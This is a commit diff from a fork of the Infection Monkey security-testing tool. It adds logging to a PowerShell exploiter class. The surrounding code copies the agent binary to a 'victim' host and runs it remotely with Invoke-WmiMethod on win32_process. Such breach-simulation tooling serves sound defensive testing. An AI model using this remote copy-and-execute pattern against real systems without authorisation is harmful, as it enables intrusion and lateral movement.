forked from p15670423/monkey
Agent: Add useful logging to powershell exploiter
This commit is contained in:
parent
876cdbeffa
commit
b871398682
|
@ -127,10 +127,13 @@ class PowerShellExploiter(HostExploiter):
|
||||||
monkey_local_file.write(monkey_virtual_file.read())
|
monkey_local_file.write(monkey_virtual_file.read())
|
||||||
|
|
||||||
def _copy_monkey_binary_to_victim(self, dest: str) -> bool:
|
def _copy_monkey_binary_to_victim(self, dest: str) -> bool:
|
||||||
|
LOG.debug(f"Attempting to copy the monkey agent binary to {self.host.ip_addr}")
|
||||||
try:
|
try:
|
||||||
self.client.copy(TEMP_MONKEY_BINARY_FILEPATH, dest)
|
self.client.copy(TEMP_MONKEY_BINARY_FILEPATH, dest)
|
||||||
|
LOG.info(f"Successfully copied the monkey agent binary to {self.host.ip_addr}")
|
||||||
return True
|
return True
|
||||||
except Exception:
|
except Exception:
|
||||||
|
LOG.warning(f"Failed to copy the monkey agent binary to {self.host.ip_addr}")
|
||||||
return False
|
return False
|
||||||
finally:
|
finally:
|
||||||
os.remove(TEMP_MONKEY_BINARY_FILEPATH)
|
os.remove(TEMP_MONKEY_BINARY_FILEPATH)
|
||||||
|
@ -140,6 +143,10 @@ class PowerShellExploiter(HostExploiter):
|
||||||
self.host, get_monkey_depth() - 1, executable_path
|
self.host, get_monkey_depth() - 1, executable_path
|
||||||
)
|
)
|
||||||
|
|
||||||
|
LOG.debug(
|
||||||
|
f"Attempting to execute the monkey agent on remote host "
|
||||||
|
f'{self.host.ip_addr} with commmand "{monkey_execution_command}"'
|
||||||
|
)
|
||||||
with self.client.wsman, RunspacePool(self.client.wsman) as pool:
|
with self.client.wsman, RunspacePool(self.client.wsman) as pool:
|
||||||
ps = PowerShell(pool)
|
ps = PowerShell(pool)
|
||||||
ps.add_cmdlet("Invoke-WmiMethod").add_parameter("path", "win32_process").add_parameter(
|
ps.add_cmdlet("Invoke-WmiMethod").add_parameter("path", "win32_process").add_parameter(
|
||||||
|
|
Loading…
Reference in New Issue